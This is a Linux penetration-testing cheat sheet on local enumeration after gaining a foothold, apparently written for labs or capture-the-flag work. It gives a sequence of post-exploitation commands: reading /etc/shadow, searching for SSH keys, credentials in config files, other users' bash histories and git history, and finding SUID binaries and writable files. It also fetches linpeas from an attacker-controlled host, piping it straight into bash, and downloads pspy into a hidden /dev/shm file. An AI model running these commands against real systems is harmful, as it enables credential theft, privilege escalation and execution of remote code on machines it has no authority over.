Local Enum
Sections Local Enum
First moves after foothold. Manual triage in the first 60 seconds, then automated tools. Privesc-specific surface lives in 06-11.
i. The first 60 seconds
Type these one after the other, scan the output:
id
whoami
hostname
uname -a
cat /etc/os-release
cat /etc/issue
sudo -n -l ## NOPASSWD check, fails silently if password needed
sudo -l 2>/dev/null ## what can I run as sudo
What to do with the output:
idshows extra groups (docker, lxd, disk, video, adm) -> instant privesc paths, see 06 PrivEsc - SUID & Sudosudo -lshows ANY allowed command -> check GTFOBinsuname -agives kernel version -> 10 PrivEsc - Kernel & Exploits candidates
ii. Process and network state
ps faux ## full process tree with args
ps -ef --forest
ss -tlnp ## listening TCP with process
ss -ulnp ## listening UDP
ss -tnp ## established TCP
netstat -tlnp 2>/dev/null ## fallback if ss missing
Look at processes running as root that you can touch:
ps -eo user,pid,comm | awk '$1=="root"' | sort -u
Internal services (listening on 127.0.0.1) are interesting, they bypass external firewall:
ss -tlnp | grep '127.0.0.1\|::1'
iii. Network and routing
ip a
ip r
arp -a
cat /etc/hosts
cat /etc/resolv.conf
Other hosts the box talks to:
last -i | head
who -a
cat /etc/hosts.allow /etc/hosts.deny 2>/dev/null
iv. Users and groups
cat /etc/passwd | grep -v 'nologin\|false'
cat /etc/group
ls -la /home
getent passwd | awk -F: '$3 >= 1000 {print $1}' ## real users only
Can you read /etc/shadow? Game over if yes:
ls -la /etc/shadow /etc/shadow-
cat /etc/shadow 2>/dev/null
v. Sudo and SUID surface (quick scan)
Full treatment in 06 PrivEsc - SUID & Sudo , quick check now:
sudo -l 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null ## SGID
getcap -r / 2>/dev/null ## capabilities, see [08 PrivEsc - Capabilities](https://jinpwn.dev/cheatsheets/linux-pentesting/08-privesc---capabilities/)
vi. Cron and scheduled tasks
cat /etc/crontab
ls -la /etc/cron.d/ /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/ /etc/cron.monthly/
crontab -l 2>/dev/null
cat /var/spool/cron/crontabs/* 2>/dev/null
systemctl list-timers --all
Look for cron jobs running scripts you can write to. See 07 PrivEsc - Cron & Timers .
vii. Writable files and directories
Files owned by root but writable by you (or your group):
find / -writable -type f 2>/dev/null | grep -v "/proc\|/sys" | head -50
find / -writable -type d 2>/dev/null | grep -v "/proc\|/sys" | head -30
## Anything in /etc that's writable is gold:
find /etc -writable -type f 2>/dev/null
World-writable files in suspicious places:
find / -perm -o+w -type f 2>/dev/null | grep -v "/proc\|/sys" | head -30
viii. Interesting file content
SSH keys lying around:
find / -name 'id_rsa*' -o -name 'id_ed25519*' -o -name 'authorized_keys' 2>/dev/null
find / -name '*.pem' -o -name '*.key' 2>/dev/null | grep -v "/proc\|/sys"
Config files often have creds:
find / \( -name '*.conf' -o -name '*.config' -o -name '*.ini' -o -name '.env' \) 2>/dev/null | xargs grep -lEi 'pass|secret|api|token' 2>/dev/null
Bash history of other users (if readable):
find / -name '.bash_history' -readable 2>/dev/null
find /home -name '.*history' -readable 2>/dev/null
Mail spool, often forgotten:
ls -la /var/mail /var/spool/mail 2>/dev/null
cat /var/mail/root 2>/dev/null
Backup files anywhere:
find / \( -name '*.bak' -o -name '*.backup' -o -name '*.old' -o -name '*.swp' \) 2>/dev/null | head
Git repos with old commits leaking creds:
find / -name '.git' -type d 2>/dev/null
## In any found .git:
git log --all --full-history -- '*pass*' '*cred*' '*.env'
ix. Mount points and filesystems
mount
cat /etc/fstab
df -h
lsblk
Look for NFS shares, unusual mounts, /dev/shm size (RAM-backed scratch space):
mount | grep -E 'nfs|cifs|fuse|tmpfs'
x. Environment and startup
env
cat ~/.bashrc ~/.profile ~/.bash_profile 2>/dev/null
cat /etc/profile /etc/bash.bashrc 2>/dev/null
ls -la /etc/profile.d/
ls -la /etc/init.d/ /etc/systemd/system/
xi. Run linpeas
Now run automated triage. Pipe from memory, no disk write:
curl -s http://10.10.14.1/linpeas.sh | bash
## or save the output:
curl -s http://10.10.14.1/linpeas.sh | bash | tee /dev/shm/.lp.out
Read the output by severity:
- Red-yellow text = 95% chance of privesc, look here first
- Yellow text = interesting, check manually
- Skip the green stuff on the first pass
Quick filter on the output file:
grep -a "95%" /dev/shm/.lp.out
grep -a -E "RED|YELLOW" /dev/shm/.lp.out
xii. pspy for cron and process spying
linpeas catches static stuff. pspy catches things that happen over time, like cron jobs running as root:
curl -s -o /dev/shm/.p http://10.10.14.1/pspy64
chmod +x /dev/shm/.p
/dev/shm/.p -pf -i 1000 ## watch for new processes
## leave it running 5+ minutes, every cron job will show
If linpeas finds nothing and the box theme suggests automation, the privesc is almost always a timed job. pspy is how you find it without guessing.
xiii. Quick triage checklist
Before opening any privesc file, confirm you’ve checked:
-
sudo -loutput - SUID binaries list
- Capabilities (
getcap -r /) - Cron jobs and systemd timers
- Writable files in /etc and /opt
- Processes running as root
- Internal listening ports (127.0.0.1)
- Mounted filesystems and exports
- User home dirs you can read (especially
/home/*/.ssh) - Linpeas red-yellow output
- pspy ran for at least 5 minutes
Then work 06 PrivEsc - SUID & Sudo -> 07 PrivEsc - Cron & Timers -> 08 PrivEsc - Capabilities in that order. Kernel exploits last.